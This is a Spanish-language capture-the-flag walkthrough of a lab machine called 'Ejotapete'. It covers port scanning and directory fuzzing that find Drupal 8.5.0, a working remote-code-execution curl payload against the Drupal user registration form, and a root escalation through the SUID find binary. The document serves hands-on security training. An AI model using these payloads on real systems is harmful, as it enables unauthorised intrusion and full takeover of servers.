Ejotapete


On this page
Enumeration
Vamos a empezar con un escaneo nmap
:
──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 11:09 CEST
Initiating ARP Ping Scan at 11:09
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:09, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:09
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:09, 0.67s elapsed (65535 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000060s latency).
Scanned at 2025-07-17 11:09:56 CEST for 1s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Vemos el puerto 80
abierto, vamos a lanzar un segundo escaneo para ver que servicio y versión corren en el:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ nmap -p80 -sCV 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 11:10 CEST
Nmap scan report for 172.17.0.2
Host is up (0.000031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: 172.17.0.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.47 seconds
Bien vemos devuelve un 403 Forbidden
, así que estará haciendo mal el redirect o habrá algo oculto. Vamos a verlo en firefox:

Hmm… Vamos a hacer fuzzing a ver si encontramos algo más interesante:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://172.17.0.2/FUZZ" -e .php,.html,.js,.txt,.css
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://172.17.0.2/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .js .txt .css
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
drupal [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 0ms]
Vemos una carpeta llamada drupal
, esto ya es más interesante. Vamos a acceder a ella:

Interesante vamos a realizar fuzzing a la carpeta drupal
a ver si encontramos algún archivo predeterminado que nos pueda chivar la versión:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap] 11:15:26 [9/9]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://172.17.0.2/drupal/FUZZ" -e .php,.html,.js,.txt,.css
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://172.17.0.2/drupal/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .js .txt .css
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.php [Status: 200, Size: 8902, Words: 1473, Lines: 233, Duration: 201ms]
contact [Status: 200, Size: 12198, Words: 1639, Lines: 252, Duration: 81ms]
search [Status: 302, Size: 388, Words: 60, Lines: 12, Duration: 10ms]
user [Status: 302, Size: 384, Words: 60, Lines: 12, Duration: 6ms]
themes [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 0ms]
modules [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
admin [Status: 403, Size: 8087, Words: 1367, Lines: 214, Duration: 18ms]
node [Status: 200, Size: 8892, Words: 1473, Lines: 233, Duration: 11ms]
sites [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 0ms]
Search [Status: 302, Size: 388, Words: 60, Lines: 12, Duration: 1009ms]
Contact [Status: 200, Size: 12180, Words: 1638, Lines: 252, Duration: 11ms]
core [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 0ms]
install.php [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 0ms]
profiles [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 0ms]
update.php [Status: 403, Size: 133, Words: 21, Lines: 1, Duration: 98ms]
README.txt [Status: 200, Size: 5889, Words: 748, Lines: 140, Duration: 0ms]
vendor [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 0ms]
Vemos el archivo install.php
, vamos a acceder a el:

Bien tenemos la versión de Drupal que es la 8.5.0
, si hacemos una búsqueda de ella podremos darnos cuenta de que hay publicado un CVE:
Shell as www-data
Vamos a explotarlo!!
Investigando me encontré con el siguiente payload:
curl -s 'http://DRUPAL-TARGET/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=id'
Vamos a probarlo contra nuestro objetivo:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ curl -s 'http://172.17.0.2/drupal/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=id'
{"command":"insert","method":"replaceWith","selector":null,"data":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
Bien!! Logramos una ejecución remota de comandos. Ahora nos enviaremos una reverse shell:

Shell as root
Vamos a enumerar binarios con el permiso SUID
:
www-data@42beeea01109:/var/www/html/drupal$ find / -perm -4000 -ls 2>/dev/null
find / -perm -4000 -ls 2>/dev/null
4850458 40 -rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
4850546 40 -rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
4850503 76 -rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
4850556 60 -rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
4882251 220 -rwsr-xr-x 1 root root 221768 Feb 18 2017 /usr/bin/find
4850456 52 -rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
4882165 140 -rwsr-xr-x 1 root root 140944 Jan 23 2021 /usr/bin/sudo
4849935 44 -rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
4849958 32 -rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
4849951 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
Vemos el binario find
que si lo buscamos en GTFObins nos comentan lo siguiente:

Bien vamos a explotarlo:
www-data@42beeea01109:/var/www/html/drupal$ /usr/bin/find . -exec /bin/bash -p \; -quit
; -quitn/find . -exec /bin/bash -p \;
bash-4.4# whoami
whoami
root